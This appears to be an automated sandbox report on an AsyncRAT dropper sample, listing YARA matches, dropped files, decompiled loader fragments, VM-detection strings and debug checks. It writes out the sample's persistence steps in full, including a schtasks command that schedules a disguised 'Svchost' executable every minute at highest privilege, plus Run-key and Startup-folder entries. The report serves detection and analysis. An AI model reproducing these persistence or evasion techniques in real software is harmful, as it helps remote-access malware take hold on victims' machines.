                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, Program.csCryptographic APIs: 'TransformFinalBlock'
                      Source: X.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: X.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Svchost.exe.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: X.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: X.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Svchost.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Svchost.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@15/12@9/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile created: C:\Users\user\AppData\Roaming\X.exeJump to behavior
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3280
                      Source: C:\Users\user\AppData\Roaming\X.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeMutant created: \Sessions\1\BaseNamedObjects\YXNfkfdcxvmu2fH4q
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2580:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\X.exeMutant created: \Sessions\1\BaseNamedObjects\o8IEVsVtNAApv1Ch
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeVirustotal: Detection: 72%
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeReversingLabs: Detection: 87%
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\X.exe "C:\Users\user\AppData\Roaming\X.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe "C:\Users\user\AppData\Roaming\61c7cdb3196df.exe"
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732Jump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: Svchost.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\Svchost.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic file information: File size 2324480 > 1048576
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1dc800
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.pdbMZ@ source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Xml.pdbu source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: lib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.pdb#( source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: .pdb. source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\X.PDB7 source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: X.exe, 00000002.00000002.2842784193.000000001BB9D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbexe= source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BB9D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BB3C000.00000004.00000020.00020000.00000000.sdmp, WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Management.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbion= source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.pdb` source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.pdbH source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER1D84.tmp.dmp.18.dr

                      Data Obfuscation

                      Source: X.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: X.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: X.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: X.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: X.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: X.exe.0.dr, Messages.cs.Net Code: Memory
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: Memory
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: Memory
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: Memory
                      Source: 61c7cdb3196df.exe.0.drStatic PE information: section name: .didata
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: section name: .text entropy: 7.7009507911079

                      Persistence and Installation Behavior

                      Source: C:\Users\user\AppData\Roaming\X.exe File created: C:\Users\user\AppData\Local\Temp\Svchost.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe File created: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe File created: C:\Users\user\AppData\Roaming\X.exe

                      Boot Survival

                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Roaming\X.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe Memory allocated: 1050000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe Memory allocated: 1ACD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\X.exe Memory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\X.exe Memory allocated: 1AB90000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\X.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\X.exe Window / User API: threadDelayed 815
                      Source: C:\Users\user\AppData\Roaming\X.exe Window / User API: threadDelayed 9020
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe TID: 1528 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\X.exe TID: 2288 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\X.exe TID: 6312 Thread sleep count: 815 > 30
                      Source: C:\Users\user\AppData\Roaming\X.exe TID: 6312 Thread sleep count: 9020 > 30
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\X.exe File Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.18.dr; Binary or memory string: vmci.syshbin
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.18.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.18.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.18.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: svchost.exe, 00000013.00000002.3876943198.000002A0E1ED6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.18.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.18.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.18.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.18.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.18.dr; Binary or memory string: vmci.sys
                      Source: Amcache.hve.18.dr; Binary or memory string: vmci.syshbin`
                      Source: Amcache.hve.18.dr; Binary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.18.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: svchost.exe, 00000013.00000003.2813846209.000002A0E2E55000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: NXTVMWare
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware20,1
                      Source: Amcache.hve.18.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.18.dr; Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: X.exe, 00000002.00000002.2842784193.000000001BB3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                      Source: Amcache.hve.18.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.18.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: X.exe, 00000002.00000002.2838234849.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: _VMware_@
                      Source: Amcache.hve.18.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.18.dr; Binary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.18.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.18.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\svchost.exe; Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\X.exe; Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\X.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe; Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe; Process created: C:\Users\user\AppData\Roaming\X.exe "C:\Users\user\AppData\Roaming\X.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe; Process created: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe "C:\Users\user\AppData\Roaming\61c7cdb3196df.exe"
                      Source: C:\Users\user\AppData\Roaming\X.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe"
                      Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280
                      Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe; Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\X.exe; Queries volume information: C:\Users\user\AppData\Roaming\X.exe VolumeInformation
